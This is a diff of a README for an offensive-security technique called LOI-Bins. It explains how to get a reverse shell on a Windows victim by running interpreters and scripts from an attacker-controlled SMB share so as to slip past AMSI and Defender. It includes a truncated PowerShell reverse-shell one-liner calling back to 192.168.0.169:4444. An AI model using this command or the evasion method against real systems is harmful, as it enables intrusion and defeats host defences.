deeexcee-io/LOI-Bins/README.md

 ## Set the Scene

 Lets say you have command execution on a host, your going to want to run a command to return a reverse shell.
-I would normally for something like powershell -c "......."
+I would normally for something like `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.0.169',4444);........" `

 Now with this aproach we have AMSI and Defender/AV.
-Assuming our victim can reach out over SMB, it is possible to copy files and execute or just execute an .exe straight from the share.
+Running something like this without an AMSI bypass or obfuscation will get killed.
+Assuming our victim can reach out over SMB, we could either copy files over and execute or just execute an .exe straight from the share which is nothing new.

 This approach does that but what we can do is call the .exe of our programming language of choice and also pass it a script, both of which are stored on our attacker controlled SMB share.
 Defender still scans the scripts but by utilising **Go, Java, PHP etc** we have more flexibility to bypass static signatures.
+Testing with random un-obfuscated reverse shell scripts in these languages has proved successful.

 You can also utilise these programming languages to carry out post exploitation in weird and wonderful ways.
-Hell, just call python.exe from the rmeote share and drop straight into the [Interpreter](#python-interpreter-example).
+You could even just call python.exe from the remote share and drop straight into the [Interpreter](#python-interpreter-example).

+The process is extremely simple.

-## <a name="Go"></a>The process is extremely simple - Example with Go
+## <a name="Go"></a>Example with Go

 1. Have a Windows Victim where you can run commands
 2. Have a Windows Attack Box with your Programming Environment of choice - Python Java and Go are the only ones I have tested so far